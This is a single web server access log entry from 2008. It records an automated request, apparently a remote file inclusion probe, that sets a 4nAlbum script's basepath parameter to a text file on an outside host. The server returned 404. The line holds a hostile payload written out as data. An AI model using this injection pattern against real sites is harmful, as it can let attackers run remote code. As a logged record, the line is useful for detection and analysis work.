72.232.122.239 - - [17/Apr/2008:10:59:13 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
